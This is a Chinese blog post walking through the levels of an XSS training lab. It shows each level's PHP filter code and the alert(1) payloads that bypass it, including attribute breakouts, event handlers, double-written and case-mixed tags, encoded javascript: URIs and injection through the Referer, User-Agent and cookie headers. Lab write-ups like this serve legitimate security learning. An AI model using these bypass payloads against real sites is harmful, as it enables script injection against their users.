XSS挑战之旅

最新推荐文章于 2023-03-10 09:19:17 发布
最新推荐文章于 2023-03-10 09:19:17 发布
阅读量235 收藏
点赞数 1
分类专栏: web安全学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45670595/article/details/114479241
版权

  • 第一关

无任何限制

  • 第二关

<h1 align=center>欢迎来到level2</h1>
<h2 align=center>没有找到和&lt;script&gt;alert(1)&lt;/script&gt;相关的结果.</h2><center>
<form action=level2.php method=GET>
<input name=keyword  value="<script>alert(1)</script>">
<input type=submit name=submit value="'搜索'"/>

标签

中的< >都被转变了

    $str = $_GET["keyword"];

    echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>

    <form action=level2.php method=GET>

    <input name=keyword  value="'.$str.'">

    <input type=submit name=submit value=搜索 />

htmlspecialchars() 函数把预定义的字符转换为 HTML 实体

https://www.cnblogs.com/JeromeZ/p/8452819.html)

这里的敏感字符< >,已经被html编码了,最后在

标签里面输出的时候浏览器再使用html解码将其原文显示出来,但是并不会再触发js引擎了,所以也就没有弹窗了,利用失败。

[浏览器各个部分编码过程](https://blog.csdn.net/osdfhv/article/details/82872314)

方法

  1. value中< >并没有被转换,我们可以通过闭合这个带有$str的input标签来达成目的
"><script>alert(1)</script>
  1. 通过事件 加 // 是为了注释掉后面的 "
123456" οnclick=alert(1)//
123456" οnfοcus=alert(1) autofocus;//		onfocus 事件在对象获得焦点时发生。
123456" οninput=alert(1) //			oninput 事件在用户输入时触发
123456" οnchange=alert(1) //

  • 第三关

    $str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level3.php method=GET>
<input name=keyword value="'.$str3.'">
<input type=submit name=submit value=搜索 />

    发现过滤 > <

    ' οnfοcus=javascript:alert(1)

    • 第四关

$str2=str_replace("<script","<scr_ipt",$str);
  echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".

  • 第五关

$str2=str_replace("<script","<scr_ipt",$str);
  $str3=str_replace("on","o_n",$str2);
  echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>

过滤了on ,所以on事件不能用了

123456"><iframe src=javascript:alert(1)>
//只弹出了 1
"><a href=javascript:alert(1)>点我啊</a>
//sucess

  



  - 第六关

  
  ```php
  $str2=str_replace("<script","<scr_ipt",$str);
  $str3=str_replace("on","o_n",$str2);
  $str4=str_replace("src","sr_c",$str3);
  $str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
  echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
  1. 没有使用前面的转换小写函数strtolower,大小写绕过
" ><sCRipt>alert(1)</script>

  • 第七关

<input name=keyword  value="move%20up!<>alert(1);</>">

发现过滤了很多关键词

输入:<script><a href><img src><sscript><scscript>

变成:

<>			<a >        <img>       <s>			<sc>

双写绕过

"><scscriptriptscript>alert(1)</scscriptriptscript>

123456" oonninput=alert(1) "

123456"> <scscriptript>alert`1`</scscriptript> //

123456"><a/hrhrefef="javascriscriptpt:alert(1)">   

123456"><img/sRsrcc=1 oneronerrorror=alert(1)>  //找不到url,触发事件

  • 第八关

  $str7=str_replace('"','&quot',$str6);
  ……
  echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';

输入,发现输入的内容在a标签的href内

过滤了:" src on script data

输出点在a标签内,href属性中,属性中双引号被转换成HTML实体,无法截断属性 :

<a href="&quot><scr_ipt>alert(1);</scr_ipt>//">友情链接</a>

协议绕过(没有成功)

javascript:alert, 由于script关键字被过滤,伪协议后面可以使用URL编码等进行编码。

javas%09cript:alert(1)
javas%0acript:alert(1)
javas%0dcript:alert(1)

输入的内容提交后到a标签的href属性里,故可以解析

javascrip&#x74;:alert(1)
javasc&#x72;ipt:alert`111`
javasc&#x0072;ipt:alert`111`

  • 第九关

    输入javascript:alert(1)查看源码显示“链接不合法”

    输入的代码中必须含有http://才不会被提示“链接不合法”。

    http://127.0.0.1/xss/level9.php?keyword=javas%0acript:alert(1) <!--  http://  -->
http://127.0.0.1/xss/level9.php?keyword=javas%0acript:alert(1) // http://

    • 第十关

    没有输入框,所以查看源码。有三个隐藏的输入框。

    <h2 align=center>没有找到和&lt;script&gt;alert(1);&lt;/script&gt;相关的结果.</h2><center>
<form id=search>
<input name="t_link"  value="" type="hidden">
<input name="t_history"  value="" type="hidden">
<input name="t_sort" value="'.$str33.'" type="hidden">
</form>

    虽然前端的t_sort输入框是隐藏的但是后端依旧能接收数据,通过构造闭合input标签,改变type隐藏属性。

    
<input name="t_sort"  value="" type="button" onclick="alert(1)" >

注入&t_sort=1” type="text"οnmοuseοver=alert(111)//

    • 第十一关

    无输入框,查看源码:

    <form id=search>
<input name="t_link"  value="" type="hidden">
<input name="t_history"  value="" type="hidden">
<input name="t_sort"  value="" type="hidden">
<input name="t_ref"  value="http://120.27.209.154:8091/level10.php?keyword=well%20done!" type="hidden">
</form>

html头部注入

突破口在t_ref,我们要修改referre值

可以通过抓包修改

1" type="text" οnmοuseοver=alert(111)//

修改后点击run,鼠标移到1这个输入文本框即可成功。

我的显示找不到网页

  • 第十二关
<input name="t_link"  value="" type="hidden">
<input name="t_history"  value="" type="hidden">
<input name="t_sort"  value="" type="hidden">
<input name="t_ua"  value="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0" type="hidden">

这一关是修改user_agenr

方法类似,这里抓包

修改user_agent为1” type=”text” οnmοuseοver=alert(111)//

  • 第十三关
<input name="t_link"  value="" type="hidden">
<input name="t_history"  value="" type="hidden">
<input name="t_sort"  value="" type="hidden">
<input name="t_cook"  value="" type="hidden">

这一关是修改cookies,

方法类似 抓包

将cookies改为1” type=”text” οnmοuseοver=alert(111)//

  • 第十四关

<body>
<h1 align=center>欢迎来到level14</h1>
<center><iframe name="leftframe" marginwidth=10 marginheight=10 src="http://www.exifviewer.org/" frameborder=no width="80%" scrolling="no" height=80%></iframe></center><center>这关成功后不会自动跳转。成功者<a href=/xsschallenge/level15.php?src=1.gif>点我进level15</a></center>
</body>
</html>

  • 第十五关

上源码:

<h1 align=center>欢迎来到第15关,自己想个办法走出去吧!</h1>
<p align=center><img src=level15.png></p>
<body><span class="ng-include:"></span></body>

要先了解一下这个ng-include属性

ng-include是AngularJS的一种指令,用于包含外部的HTML文件,包含内容作于指定元素的子节点。ng-include 属性的值可以是一个表达式,返回一个文件名。默认情况下,包含的文件需要包含在同一个域名下。我们就引用第一关的页面,其中包含img标签

这个我不是很会,主要是第一关的写完代码后那个页面会直接弹窗进入第二关。

  • 第十六关

<center><s%63ript>alert(1)<%2fs%63ript></center><center>

过滤了一些东西如script / 也过滤了空格

看网上的也没成,查看源码原封不动输出来了:

<a%0Ahref=jav%26%23x61%3b%26%23x73%3b%26%23x63%3bript:alert(1)>123

  • 第十七关

url:http://120.27.209.154:8091/level17.php?arg01=a&arg02=b

源码:

<body>
<h1 align=center>欢迎来到level17</h1>
<embed src=xsf01.swf?a=b width=100% heigth=100%><h2 align=center>成功后,<a href=level18.php?arg01=a&arg02=b>点我进入下一关</a></h2>
</body>
</html>

后台接收了arg01和arg02两个值。

先了解一下这个embed标签是啥,这个标签定义了嵌入的内容,如插件。

用法

<embed src="helloworld.swf" />

我们可以给这个标签注入一些事件,如οnlοad=alert(11)等

注入arg01=1 &arg02=2 οnclick=alert(11)然后点击那个插件就弹出窗口了。这关为什么要这样弄呢?首先是要接收两个参数,我们就传给他两个参数,然后我们在第二个参数后面附加了一个事件,当点击时就会执行。

我注入后没有显示插件,源码:

<body>
<h1 align=center>欢迎来到level17</h1>
<embed src=xsf01.swf?a=b οnclick=alert(11) width=100% heigth=100%><h2 align=center>成功后,<a href=level18.php?arg01=a&arg02=b>点我进入下一关</a></h2>
</body>
</html>

参考:

XSS挑战之旅 | 大专栏)

XSS挑战之旅学习总结 - SecPulse.COM | 安全脉搏 (很多源码不一致)

XSS挑战之旅(1~10) - 简书

瓜皮鸭
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss-challenge(挑战之旅1~13)
weixin_55404107的博客
10-21 345
好。
xss labs 挑战之旅
lemonwei
06-05 785
没事重新从xss的源码分析一下形成和利用 xss挑战之旅进入一关,发现url中有一个参数name可控;测试测试一下,弹窗成功,在xss中拥有同样弹窗效果的函数alert,还有prompt,以及confirm和prompt 查看原码发现对输出没有进行过滤,直接get参数输出 查看原码发现对输出没有进行过滤,直接get参数输出 2. 第二关进入,看到输入发现没回应,查看原码被转义了尝试构造闭合payload 打开源码发现一处被htmlspecialchars($str)转义另一处没有转义 3. 进入
xss挑战之旅
吾所在处,即为净土
01-20 471
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
xss闯关挑战
11-09
这个是XSS闯关文件,解压后放在服务器的对应文件夹即可。 闯关笔记我博客中有记录,新手可以参考。 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如...
xsschallenge.rar
06-28
XSS挑战之旅——深入解析跨站脚本攻击》 XSS(Cross-Site Scripting)挑战之旅,是一项旨在帮助网络安全爱好者和从业人员深入了解并掌握XSS攻击与防御技术的实践项目。通过参与“xsschallenge”,你可以一步步地...
分布式数据库旅游
10-06
分布式数据库是解决大数据和高并发问题的关键技术之一。它将数据分布在多个物理节点上,每个节点都可以独立处理查询请求,从而提高了系统的处理能力和可用性。在旅游订票系统中,分布式数据库能够确保在高峰期,如节...
架构狮之路
08-10
在IT行业中,架构狮之路是一条充满挑战与机遇的探索之旅。这可能指的是软件架构师的成长过程,他们需要深入理解源码,掌握各种工具,并具备解决复杂系统问题的能力。在这个过程中,阅读和理解源码是提升技能的关键...
在线旅游的安全现.pdf
08-07
标题所指的“在线旅游的安全现状”,显然涉及到了在线旅游行业所面临的安全挑战和风险。在线旅游行业高度依赖于互联网技术,提供包括但不限于酒店预订、机票预定、旅游套餐购买等服务。由于涉及大量个人及财务信息,...
XSS挑战之旅(10-18)
老司机开代码的博客
08-31 664
文章目录第十关第十一关第十二关第十三关第十四关第十五关第十六关第十七关第十八关 第十关 构造url提交 level10.php?keyword=<script>alert(1)</script> 首先ctrl+U看一下页面源码: <h1 align=center>欢迎来到level10</h1> <h2 align=center>没有找到和&lt;script&gt;alert(1)&lt;/script&gt;相
安全学习之XSS——XSS挑战之旅
Jason_TBWH的博客
01-14 890
今天算是假期学习的第一天吧,回顾了一下暑假的学习过程,觉得有必要在xss和sql注入这里重点加强一下,相应的也包括JS,php,sql语言的跟进学习。 学习过程大致是,看书,看视频,练习,总结。 寒假还有好多事要做,每天的学习尽量提高点效率。少睡觉,少打游戏,想想自己的未来。 XSS这块其实内容很多,花样也很多,可浅可深,目前我打算通过靶场练习一下基本功,就当做玩了。 靶场链接:http://xs...
XSS挑战之旅Level(1-5)
最新发布
m0_52701599的博客
03-10 440
XSS挑战之旅Level(1-7)详细步骤
XSS学习-XSS挑战之旅(二)
Lemon's blog
07-24 554
前言:之前打XSS平台时,打到了第11关就没有继续了,现在有空了就继续打咯,再增加点关于XSS的知识。 第十一关
xss挑战之旅level 1 - level 4
Miss的博客
04-20 261
Level 1: 观察url中的?name参数,向网站提交数据,然后返回到页面上。 <script>alert(1)</script> Level 2: 第二关是可以在输入框中输入一个数据提交给服务器,然后提交的数据是会被显示到页面上的。此时再使用第一关的payload已经是不行了。看一下源码: 在这里,提交的scirpt被当作页面的内容和value的值处理了,因此没有形成html结构被浏览器执行。尝试一下闭合value,然后构造一个script标签进去。在输入框中输入以下代
靶场通关-XSS挑战之旅(1-5)
m0_56634355的博客
06-04 1423
直接使用在线靶场网址:https://xss.angelo.org.cn本地搭建xss靶场,这个简单百度吧点击图片后,进入下图:我们可以看到用于js弹窗的代码顺利执行了 看看源码,分析一下 接下来去服务器端看看这一关的源码......
XSS闯关挑战
weixin_34417200的博客
05-15 223
XSS跨站*** 本文参考公众号07v8论安全 XSS***全称跨站脚本***,XSS是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。 XSS***分成两类1、一类是来自内部的***,主要指的是利用程序自身的漏洞,构造跨站语句。2、另一类则是来自外部的***,主要指的自己构造XSS跨站漏洞网页或者寻找非目标机以外的有跨站漏洞的网页...
XSS挑战之旅1-10关
weixin_52116519的博客
11-15 1413
XSS漏洞介绍。
xss挑战之旅11关到13关,操作步骤配截图。
jzzer447的博客
04-15 563
level11 分析代码,相比上一关,多了一个str11=$_SERVER['HTTP_REFERER'];验证的是http头部的xss注入,使用burp抓包,修改相应的字段,构造http头部referer的payload。 头部本身没有Referer,自行添加了 payload:Referer:" onmouseover=alert(11) type="text" Referer:" onclick="alert(11)" type="text level12...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值